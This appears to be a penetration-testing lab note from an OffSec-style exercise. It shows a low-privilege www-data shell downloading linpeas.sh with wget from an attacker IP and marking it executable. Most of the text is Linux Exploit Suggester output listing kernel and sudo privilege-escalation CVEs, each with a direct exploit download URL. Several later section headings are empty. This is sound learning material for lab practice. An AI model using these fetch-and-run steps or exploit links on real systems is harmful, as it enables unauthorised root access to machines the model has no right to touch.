PEAS


Conducting an automated enumeration after performing a manual enumeration

www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/linpeas.sh; chmod 755 ./linpeas.sh

Delivery complete

Executing PEAS

CVEs


╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow 2
 
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2010-3904] rds
 
   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
 
[+] [CVE-2016-5195] dirtycow
 
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
 
   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: probable
   Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},[ ubuntu=10.04 ]{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c
 
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
 
   Details: https://www.exploit-db.com/exploits/17787/
   Exposure: probable
   Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}
   Download URL: https://www.exploit-db.com/download/17787
 
[+] [CVE-2010-3437] pktcdvd
 
   Details: https://www.exploit-db.com/exploits/15150/
   Exposure: probable
   Tags: [ ubuntu=10.04 ]
   Download URL: https://www.exploit-db.com/download/15150
 
[+] [CVE-2010-3301] ptrace_kmod2
 
   Details: https://www.exploit-db.com/exploits/15023/
   Exposure: probable
   Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},[ ubuntu=(10.04|10.10) ]{kernel:2.6.(32|35)-(19|21|24)-server}
   Download URL: https://www.exploit-db.com/download/15023
 
[+] [CVE-2010-2959] can_bcm
 
   Details: https://www.exploit-db.com/exploits/14814/
   Exposure: probable
   Tags: [ ubuntu=10.04 ]{kernel:2.6.32-24-generic}
   Download URL: https://www.exploit-db.com/download/14814
 
[+] [CVE-2010-0832] PAM MOTD
 
   Details: https://www.exploit-db.com/exploits/14339/
   Exposure: probable
   Tags: [ ubuntu=9.10|10.04 ]
   Download URL: https://www.exploit-db.com/download/14339
   Comments: SSH access to non privileged user is needed
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-18634] sudo pwfeedback
 
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.
 
[+] [CVE-2017-6074] dccp
 
   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
 
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
 
   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
   Comments: Uses "Stack Clash" technique
 
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
 
   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
 
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
 
   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
 
[+] [CVE-2017-0358] ntfs-3g-modprobe
 
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
 
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
 
   Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
   Exposure: less probable
   Tags: ubuntu=16.04.1
   Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
   Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
 
[+] [CVE-2014-5119] __gconv_translit_find
 
m/2014/08/the-poisoned-nul-byte-2014-edition.html
   Exposure: less probable
   Tags: debian=6
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz
 
[+] [CVE-2014-0196] rawmodePTY
 
   Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/33516
 
[+] [CVE-2013-2094] semtex
 
   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: less probable
   Tags: RHEL=6
   Download URL: https://www.exploit-db.com/download/25444
 
[+] [CVE-2013-0268] msr
 
   Details: https://www.exploit-db.com/exploits/27297/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/27297
 
[+] [CVE-2010-4347] american-sign-language
 
   Details: https://www.exploit-db.com/exploits/15774/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/15774
 
[+] [CVE-2010-3081] video4linux
 
   Details: https://www.exploit-db.com/exploits/15024/
   Exposure: less probable
   Tags: RHEL=5
   Download URL: https://www.exploit-db.com/download/15024
 
[+] [CVE-2010-1146] reiserfs
 
   Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
   Exposure: less probable
   Tags: ubuntu=9.10
   Download URL: https://jon.oberheide.org/files/team-edward.py

Installed Programs


Apache


MySQL


SSH


SUID


SGID


Interesting Files / Directories